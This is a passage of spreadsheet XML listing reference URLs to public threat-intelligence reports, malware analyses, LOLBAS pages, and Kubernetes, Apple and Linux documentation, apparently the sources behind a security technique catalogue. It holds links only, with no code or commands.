    <t>http://www.securelist.com/en/downloads/vlpdfs/kaspersky-the-net-traveler-part1-final.pdf</t>
  </si>
  <si>
    <t>https://securelist.com/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/73673/</t>
  </si>
  <si>
    <t>https://securelist.com/faq-the-projectsauron-apt/75533/</t>
  </si>
  <si>
    <t>https://securelist.com/files/2016/07/The-ProjectSauron-APT_research_KL.pdf</t>
  </si>
  <si>
    <t>https://securelist.com/files/2016/07/The-ProjectSauron-APT_Technical_Analysis_KL.pdf</t>
  </si>
  <si>
    <t>https://securelist.com/qakbot-technical-analysis/103931/</t>
  </si>
  <si>
    <t>https://securelist.com/zero-day-vulnerability-in-telegram/83800/</t>
  </si>
  <si>
    <t>https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf</t>
  </si>
  <si>
    <t>https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/08/07172148/ShadowPad_technical_description_PDF.pdf</t>
  </si>
  <si>
    <t>https://securelist.com/sodin-ransomware/91473/</t>
  </si>
  <si>
    <t>https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/</t>
  </si>
  <si>
    <t>https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf</t>
  </si>
  <si>
    <t>https://www.kaspersky.com/blog/lenovo-pc-with-adware-superfish-preinstalled/7712/</t>
  </si>
  <si>
    <t>https://securelist.com/project-tajmahal/90240/</t>
  </si>
  <si>
    <t>https://securelist.com/lazarus-threatneedle/100803/</t>
  </si>
  <si>
    <t>https://securelist.com/darkhalo-after-solarwinds-the-tomiris-connection/104311/</t>
  </si>
  <si>
    <t>https://securelist.com/transparent-tribe-part-1/98127/</t>
  </si>
  <si>
    <t>https://securelist.com/the-epic-turla-operation/65545/</t>
  </si>
  <si>
    <t>https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08080105/KL_Epic_Turla_Technical_Appendix_20140806.pdf</t>
  </si>
  <si>
    <t>https://securelist.com/the-penquin-turla-2/67962/</t>
  </si>
  <si>
    <t>https://securelist.com/wirtes-campaign-in-the-middle-east-living-off-the-land-since-at-least-2019/105044</t>
  </si>
  <si>
    <t>https://securelist.com/winnti-more-than-just-a-game/37029/</t>
  </si>
  <si>
    <t>https://securelist.com/games-are-over/70991/</t>
  </si>
  <si>
    <t>https://securelist.com/the-great-bank-robbery-the-carbanak-apt/68732/</t>
  </si>
  <si>
    <t>https://github.com/gentilkiwi/kekeo</t>
  </si>
  <si>
    <t>https://www.kernel.org/doc/html/latest/security/self-protection.html</t>
  </si>
  <si>
    <t>https://patchwork.kernel.org/patch/8754821/</t>
  </si>
  <si>
    <t>https://www.contextis.com/blog/comma-separated-vulnerabilities</t>
  </si>
  <si>
    <t>https://www.intelligence.senate.gov/sites/default/files/documents/os-kmandia-033017.pdf</t>
  </si>
  <si>
    <t>https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption</t>
  </si>
  <si>
    <t>https://developer.apple.com/documentation/security/keychain_services/keychain_items</t>
  </si>
  <si>
    <t>https://developer.apple.com/documentation/security/keychain_services</t>
  </si>
  <si>
    <t>https://www.antitree.com/2020/07/keyctl-unmask-going-florida-on-the-state-of-containerizing-linux-keyrings/</t>
  </si>
  <si>
    <t>https://support.apple.com/en-us/HT201710</t>
  </si>
  <si>
    <t>https://kifarunix.com/scheduling-tasks-using-at-command-in-linux/</t>
  </si>
  <si>
    <t>https://www.bleepingcomputer.com/news/security/killdisk-disk-wiping-malware-adds-ransomware-component/</t>
  </si>
  <si>
    <t>https://www.usenix.org/legacy/event/woot/tech/final_files/Cui.pdf</t>
  </si>
  <si>
    <t>https://drwho.virtadpt.net/images/killing_the_myth_of_cisco_ios_rootkits.pdf</t>
  </si>
  <si>
    <t>https://helgeklein.com/blog/2010/04/active-setup-explained/</t>
  </si>
  <si>
    <t>https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2</t>
  </si>
  <si>
    <t>https://www.fsec.or.kr/user/bbs/fsec/163/344/bbsDataView/1382.do?page=1&amp;column=&amp;search=&amp;searchSDate=&amp;searchEDate=&amp;bbsDataCategory=</t>
  </si>
  <si>
    <t>https://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/</t>
  </si>
  <si>
    <t>https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/</t>
  </si>
  <si>
    <t>https://krebsonsecurity.com/2019/02/a-deep-dive-on-the-recent-widespread-dns-hijacking-attacks/</t>
  </si>
  <si>
    <t>https://krebsonsecurity.com/2017/01/who-is-anna-senpai-the-mirai-worm-author/</t>
  </si>
  <si>
    <t>https://krebsonsecurity.com/2016/10/hackforums-shutters-booter-service-bazaar/</t>
  </si>
  <si>
    <t>https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/</t>
  </si>
  <si>
    <t>https://www.kroll.com/en/insights/publications/cyber/qakbot-malware-exfiltrating-emails-thread-hijacking-attacks</t>
  </si>
  <si>
    <t>https://www.kroll.com/en/insights/publications/malware-analysis-report-rawpos-malware</t>
  </si>
  <si>
    <t>https://kubernetes.io/docs/reference/kubectl/kubectl/</t>
  </si>
  <si>
    <t>https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.19/#pod-v1-core</t>
  </si>
  <si>
    <t>https://kubernetes.io/docs/tasks/debug-application-cluster/get-shell-running-container/</t>
  </si>
  <si>
    <t>https://www.kubeflow.org/docs/components/pipelines/overview/pipelines-overview/</t>
  </si>
  <si>
    <t>https://kubernetes.io/docs/concepts/overview/kubernetes-api/</t>
  </si>
  <si>
    <t>https://kubernetes.io/docs/concepts/security/controlling-access/</t>
  </si>
  <si>
    <t>https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/</t>
  </si>
  <si>
    <t>https://kubernetes.io/docs/tasks/access-application-cluster/web-ui-dashboard/</t>
  </si>
  <si>
    <t xml:space="preserve">https://media.defense.gov/2021/Aug/03/2002820425/-1/-1/1/CTR_KUBERNETES%20HARDENING%20GUIDANCE.PDF </t>
  </si>
  <si>
    <t>https://kubernetes.io/docs/concepts/workloads/controllers/job/</t>
  </si>
  <si>
    <t>https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/</t>
  </si>
  <si>
    <t>https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/</t>
  </si>
  <si>
    <t>https://man7.org/linux/man-pages//man7/libc.7.html</t>
  </si>
  <si>
    <t>https://xorl.wordpress.com/2018/02/17/lkm-loading-kernel-restrictions/</t>
  </si>
  <si>
    <t>https://lolbas-project.github.io/lolbas/Binaries/Certutil/</t>
  </si>
  <si>
    <t>https://lolbas-project.github.io/lolbas/Binaries/Esentutl/</t>
  </si>
  <si>
    <t>https://lolbas-project.github.io/lolbas/Binaries/Expand/</t>
  </si>
  <si>
    <t>https://lolbas-project.github.io/lolbas/Binaries/Installutil/</t>
  </si>
  <si>
    <t>https://lolbas-project.github.io/</t>
  </si>
  <si>
    <t>https://lolbas-project.github.io/lolbas/Binaries/Mavinject/</t>
  </si>
  <si>
    <t>https://lolbas-project.github.io/lolbas/Binaries/Msbuild/</t>
  </si>
  <si>
    <t>https://lolbas-project.github.io/lolbas/Binaries/Mshta/</t>
  </si>
  <si>
    <t>https://lolbas-project.github.io/lolbas/Binaries/Msiexec/</t>
  </si>
  <si>
    <t>https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/</t>
  </si>
  <si>
    <t>https://github.com/LOLBAS-Project/LOLBAS#criteria</t>
  </si>
  <si>
    <t>https://lolbas-project.github.io/lolbas/Binaries/Regasm/</t>
  </si>
  <si>
    <t>https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/</t>
  </si>
  <si>
    <t>https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/</t>
  </si>
  <si>
    <t>https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/</t>
  </si>
  <si>
    <t>https://lolbas-project.github.io/lolbas/Binaries/Verclsid/</t>
  </si>
  <si>
    <t>https://lolbas-project.github.io/lolbas/Binaries/Wmic/</t>
  </si>
  <si>
    <t>https://lab52.io/blog/wirte-group-attacking-the-middle-east/</t>
  </si>
  <si>
    <t>https://www.lacework.com/blog/taking-teamtnt-docker-images-offline/</t>
  </si>
  <si>
    <t>https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf</t>
  </si>
  <si>
    <t>https://www.lastline.com/labsblog/defeating-darkhotel-just-in-time-decryption/</t>
  </si>
  <si>
    <t>http://labs.lastline.com/an-analysis-of-plugx</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/archive/blogs/jepayne/tracking-lateral-movement-part-one-special-groups-and-specific-service-accounts</t>
  </si>
  <si>
    <t>http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion</t>
  </si>
  <si>
    <t>https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1</t>
  </si>
  <si>
    <t>https://developer.apple.com/documentation/coreservices/launch_services</t>
  </si>
  <si>
    <t>https://bradleyjkemp.dev/post/launchdaemon-hijacking/</t>
  </si>
  <si>
    <t>https://ss64.com/osx/launchctl.html</t>
  </si>
  <si>
    <t>https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/</t>
  </si>
  <si>
    <t>https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/</t>
  </si>
  <si>
    <t>https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html</t>
  </si>
  <si>
    <t>http://www.autosectools.com/process-hollowing.pdf</t>
  </si>
  <si>
    <t>https://www.crowdstrike.com/blog/lemonduck-botnet-targets-docker-for-cryptomining-operations/</t>
  </si>
  <si>
    <t>https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf</t>
  </si>
  <si>
    <t>https://letsencrypt.org/docs/faq/</t>
  </si>
  <si>
    <t>https://linux.die.net/man/1/ftp</t>
  </si>
  <si>
    <t>https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.</t>
  </si>
  <si>
    <t>https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html</t>
  </si>
  <si>
    <t>https://www.kernel.org/doc/html/v4.12/core-api/kernel-api.html</t>
  </si>
  <si>
    <t>http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html</t>
  </si>
  <si>
    <t>https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf</t>
  </si>
  <si>
    <t>http://tldp.org/HOWTO/Module-HOWTO/x197.html</t>
  </si>
  <si>
    <t>https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/</t>
  </si>
  <si>
    <t>https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html</t>
  </si>
  <si>
    <t>https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/</t>
  </si>
  <si>
    <t>https://man7.org/linux/man-pages/man1/at.1p.html</t>
  </si>
  <si>
    <t>http://man7.org/linux/man-pages/man1/systemd.1.html</t>
  </si>
  <si>
    <t>https://wiki.archlinux.org/index.php/Bash#Invocation</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/rest/api/storageservices/list-blobs</t>
  </si>
  <si>
    <t>https://docs.aws.amazon.com/AmazonS3/latest/API/API_ListObjectsV2.html</t>
  </si>
  <si>
    <t>http://lockboxx.blogspot.com/2019/07/macos-red-teaming-206-ard-apple-remote.html</t>
  </si>
  <si>
    <t>https://logrhythm.com/blog/do-you-trust-your-computer/</t>
  </si>
  <si>
    <t>https://logrhythm.com/blog/a-technical-analysis-of-wannacry-ransomware/</t>
  </si>
  <si>
    <t>https://developer.apple.com/library/archive/samplecode/LoginItemsAE/Introduction/Intro.html#//apple_ref/doc/uid/DTS10003788</t>
  </si>
  <si>
    <t>https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html</t>
  </si>
  <si>
    <t>https://developer.apple.com/documentation/devicemanagement/loginwindowscripts</t>
  </si>
  <si>
    <t>https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf</t>
  </si>
  <si>
    <t>http://researchcenter.paloaltonetworks.com/2015/12/attack-on-french-diplomat-linked-to-operation-lotus-blossom/</t>
  </si>
  <si>
    <t>https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossom.html</t>
  </si>
  <si>
    <t>https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/OSX_Technology_Overview/CocoaApplicationLayer/CocoaApplicationLayer.html#//apple_ref/doc/uid/TP40001067-CH274-SW1</t>
  </si>
  <si>
    <t>https://www.mdsec.co.uk/2020/06/detecting-and-advancing-in-memory-net-tradecraft/</t>
  </si>
  <si>
    <t>https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/</t>
  </si>
  <si>
    <t>https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/</t>
  </si>
  <si>
    <t>https://portswigger.net/daily-swig/mfa-fatigue-attacks-users-tricked-into-allowing-device-access-due-to-overload-of-push-notifications</t>
  </si>
  <si>
    <t>https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html</t>
  </si>
  <si>
    <t>http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about</t>
  </si>
  <si>
    <t>http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research</t>
  </si>
  <si>
    <t>https://github.com/MITRECND/malchive/blob/main/malchive/utilities/findapihash.py</t>
  </si>
  <si>
    <t>https://web.archive.org/web/20140804175025/http:/blogs.technet.com/b/mmpc/archive/2012/10/03/malware-signed-with-the-adobe-code-signing-certificate.aspx</t>
  </si>
  <si>
    <t>https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/</t>
  </si>
  <si>
    <t>https://support.microsoft.com/en-us/help/2962486/ms14-025-vulnerability-in-group-policy-preferences-could-allow-elevati</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/en-us/library/ms679687.aspx</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/en-us/library/ms649012</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/en-us/library/ff919712.aspx</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/library/ms536471.aspx</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/en-us/library/50614e95.aspx</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/library/dd393574.aspx</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/en-us/library/tzat5yw6.aspx</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/en-us/library/04za0hca.aspx</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/ms724961.aspx</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office</t>
  </si>
  <si>
    <t>https://msdn.microsoft.com/en-us/library/aa394582.aspx</t>
  </si>
  <si>
    <t>https://msrc-blog.microsoft.com/2021/06/25/new-nobelium-activity/</t>
  </si>
  <si>
    <t>https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/</t>
  </si>
  <si>
    <t>https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/</t>
  </si>
  <si>
    <t>https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/</t>
  </si>
  <si>
    <t>https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/</t>
  </si>
  <si>
    <t>https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/</t>
  </si>
  <si>
    <t>https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/</t>
  </si>
  <si>
    <t>https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/</t>
  </si>
  <si>
    <t>https://msitpros.com/?p=3960</t>
  </si>
  <si>
    <t>https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/</t>
  </si>
  <si>
    <t>https://arstechnica.com/security/2016/07/after-hiatus-in-the-wild-mac-backdoors-are-suddenly-back/</t>
  </si>
  <si>
    <t>https://support.apple.com/guide/mail/reply-to-forward-or-redirect-emails-mlhlp1010/mac</t>
  </si>
  <si>
    <t>https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/</t>
  </si>
  <si>
    <t>https://support.apple.com/guide/mail/use-rules-to-manage-emails-you-receive-mlhlp1017/mac</t>
  </si>
  <si>
    <t>https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac</t>
  </si>
  <si>
    <t>https://www.mcafee.com/blogs/other-blogs/mcafee-labs/macro-malware-targets-macs/</t>
  </si>
  <si>
    <t>https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html</t>
  </si>
  <si>
    <t>https://www.microsoft.com/security/blog/2022/08/24/magicweb-nobeliums-post-compromise-trick-to-authenticate-as-anyone/</t>
  </si>
  <si>
    <t>https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf</t>
  </si>
  <si>
    <t>https://www.microsoft.com/security/blog/2021/12/08/improve-kernel-security-with-the-new-microsoft-vulnerable-and-malicious-driver-reporting-center/</t>
  </si>
  <si>
    <t>https://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a</t>
  </si>
  <si>
    <t>http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf</t>
  </si>
  <si>
    <t>https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2009/01/15/malware-trying-to-avoid-some-countries/</t>
  </si>
  <si>
    <t>https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/</t>
  </si>
  <si>
    <t>https://blog.malwarebytes.com/threat-intelligence/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/</t>
  </si>
  <si>
    <t>https://www.malwarebytes.com/resources/files/2021/02/lazyscripter.pdf</t>
  </si>
  <si>
    <t>https://blog.malwarebytes.com/threat-analysis/2020/02/fraudsters-cloak-credit-card-skimmer-with-fake-content-delivery-network-ngrok-server/</t>
  </si>
  <si>
    <t>https://www.malwarebytes.com/blog/news/2018/05/seo-poisoning-is-it-worth-it</t>
  </si>
  <si>
    <t>https://www.malwarebytes.com/blog/news/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure</t>
  </si>
  <si>
    <t>https://blog.malwarebytes.com/threat-analysis/2017/10/decoy-microsoft-word-document-delivers-malware-through-rat/</t>
  </si>
  <si>
    <t>https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html</t>
  </si>
  <si>
    <t>https://www.malwaretech.com/2014/11/virtual-file-systems-for-beginners.html</t>
  </si>
  <si>
    <t>https://malwareunicorn.org/workshops/macos_dylib_injection.html#5</t>
  </si>
  <si>
    <t>https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/</t>
  </si>
  <si>
    <t>https://blog.malwarebytes.com/threat-analysis/2018/04/new-crossrider-variant-installs-configuration-profiles-on-macs/</t>
  </si>
  <si>
    <t>https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/</t>
  </si>
  <si>
    <t>https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/</t>
  </si>
  <si>
    <t>https://support.malwarebytes.com/docs/DOC-2295</t>
  </si>
  <si>
    <t>https://www.malwarebytes.com/blog/news/2019/12/theres-an-app-for-that-web-skimmers-found-on-paas-heroku</t>
  </si>
  <si>
    <t>https://blog.malwarebytes.com/threat-analysis/2020/06/higaisa/</t>
  </si>
  <si>
    <t>https://blog.malwarebytes.com/threat-intelligence/2022/03/double-header-isaacwiper-and-caddywiper/</t>
  </si>
  <si>
    <t>https://blog.malwarebytes.com/threat-intelligence/2022/01/konni-evolves-into-stealthier-rat/</t>
  </si>
  <si>
    <t>https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/</t>
  </si>
  <si>
    <t>https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/</t>
  </si>
  <si>
    <t>https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/</t>
  </si>
  <si>
    <t>https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/</t>
  </si>
  <si>
    <t>https://blog.malwarebytes.com/threat-analysis/2021/01/retrohunting-apt37-north-korean-apt-used-vba-self-decode-technique-to-inject-rokrat/</t>
  </si>
  <si>
    <t>https://blog.malwarebytes.com/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader/</t>
  </si>
  <si>
    <t>https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/</t>
  </si>
  <si>
    <t>https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/</t>
  </si>
  <si>
    <t>https://blog.malwarebytes.com/cybercrime/social-engineering-cybercrime/2017/03/new-targeted-attack-saudi-arabia-government/</t>
  </si>
  <si>
    <t>https://blog.malwarebytes.com/101/2016/01/the-windows-vaults/</t>
  </si>
  <si>
    <t>https://blog.malwarebytes.com/trojans/2019/09/trickbot-adds-new-trick-to-its-arsenal-tampering-with-trusted-texts/</t>
  </si>
  <si>
    <t>https://blog.malwarebytes.com/cybercrime/2013/10/hiding-in-plain-sight/</t>
  </si>
  <si>
    <t>https://www.man7.org/linux/man-pages/man8/ld.so.8.html</t>
  </si>
  <si>
    <t>https://linux.die.net/man/8/pam_unix</t>
  </si>
  <si>
    <t>https://www.mandiant.com/resources/synful-knock-acis</t>
  </si>
  <si>
    <t>https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf</t>
  </si>
  <si>
    <t>https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report-appendix.zip</t>
  </si>
  <si>
    <t>https://www.mandiant.com/resources/tracking-apt29-phishing-campaigns</t>
  </si>
  <si>
    <t>https://www.mandiant.com/resources/apt41-initiates-global-intrusion-campaign-using-multiple-exploits</t>
  </si>
  <si>
    <t>https://www.mandiant.com/media/17826</t>
  </si>
  <si>
    <t>https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors</t>
  </si>
  <si>
    <t>https://www.mandiant.com/resources/bring-your-own-land-novel-red-teaming-technique</t>
  </si>
  <si>
    <t>https://www.fireeye.com/content/dam/collateral/en/wp-m-unc2452.pdf</t>
  </si>
  <si>
    <t>https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode</t>
  </si>
  <si>
    <t>https://www.youtube.com/watch?v=fevGZs0EQu8</t>
  </si>
  <si>
    <t>https://digital-forensics.sans.org/summit-archives/2010/35-glyer-apt-persistence-mechanisms.pdf</t>
  </si>
  <si>
    <t>https://dl.mandiant.com/EE/assets/PDF_MTrends_2011.pdf</t>
  </si>
  <si>
    <t>https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf</t>
  </si>
  <si>
    <t>https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf</t>
  </si>
  <si>
    <t>https://content.fireeye.com/m-trends/rpt-m-trends-2020</t>
  </si>
  <si>
    <t>http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016</t>
  </si>
  <si>
    <t>https://www.mandiant.com/resources/operation-ke3chang-targeted-attacks-against-ministries-of-foreign-affairs</t>
  </si>
  <si>
    <t>https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation</t>
  </si>
  <si>
    <t>https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation</t>
  </si>
  <si>
    <t>https://www.mandiant.com/resources/telegram-malware-iranian-espionage</t>
  </si>
  <si>
    <t>https://www.mandiant.com/resources/blog/suspected-iranian-actor-targeting-israeli-shipping</t>
  </si>
  <si>
    <t>https://www.mandiant.com/resources/ukraine-crisis-cyber-threats</t>
  </si>
  <si>
    <t>https://www.mandiant.com/resources/blog/golang-internals-symbol-recovery</t>
  </si>
  <si>
    <t>https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e</t>
  </si>
  <si>
    <t>https://securingtomorrow.mcafee.com/mcafee-labs/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign/</t>
  </si>
  <si>
    <t>http://securityaffairs.co/wordpress/65318/hacking/dde-attack-apt28.html</t>
  </si>
  <si>
    <t>https://www.mcafee.com/enterprise/en-us/assets/reports/rp-babuk-ransomware.pdf</t>
  </si>
  <si>
    <t>https://securingtomorrow.mcafee.com/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/</t>
  </si>
  <si>
    <t>https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/</t>
  </si>
  <si>
    <t>https://www.mcafee.com/enterprise/en-us/assets/reports/rp-cuba-ransomware.pdf</t>
  </si>
  <si>
    <t>https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-dianxun.pdf</t>
  </si>
  <si>
    <t>https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/</t>
  </si>
  <si>
    <t>https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/</t>
  </si>
  <si>
    <t>https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/</t>
  </si>
  <si>
    <t>https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-a-job-offer-thats-too-good-to-be-true/?hilite=%27Operation%27%2C%27North%27%2C%27Star%27</t>
  </si>
  <si>
    <t>https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-behind-the-scenes/</t>
  </si>
  <si>
    <t>https://www.mcafee.com/blogs/other-blogs/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/</t>
  </si>
  <si>
    <t>https://securingtomorrow.mcafee.com/mcafee-labs/malicious-document-targets-pyeongchang-olympics/</t>
  </si>
  <si>
    <t>https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/</t>
  </si>
  <si>
    <t>https://securingtomorrow.mcafee.com/mcafee-labs/netwire-rat-behind-recent-targeted-attacks/</t>
  </si>
  <si>
    <t>https://scadahacker.com/library/Documents/Cyber_Events/McAfee%20-%20Night%20Dragon%20-%20Global%20Energy%20Cyberattacks.pdf</t>
  </si>
  <si>
    <t>https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-oceansalt.pdf</t>
  </si>
  <si>
    <t>https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-crescendo/</t>
  </si>
  <si>
    <t>https://www.mcafee.com/blogs/other-blogs/mcafee-labs-detects-zero-day-exploit-targeting-microsoft-office-2</t>
  </si>
  <si>
    <t>https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-returns-to-wipe-systems-in-middle-east-europe/</t>
  </si>
  <si>
    <t>https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems/</t>
  </si>
  <si>
    <t>https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf</t>
  </si>
  <si>
    <t>https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/</t>
  </si>
  <si>
    <t>https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/</t>
  </si>
  <si>
    <t>https://arstechnica.com/information-technology/2012/03/the-pwn-plug-is-a-little-white-box-that-can-hack-your-network/</t>
  </si>
  <si>
    <t>https://www.mcafee.com/blogs/other-blogs/mcafee-labs/clop-ransomware/</t>
  </si>
  <si>
    <t>https://elis531989.medium.com/the-chronicles-of-bumblebee-the-hook-the-bee-and-the-trickbot-connection-686379311056</t>
  </si>
  <si>
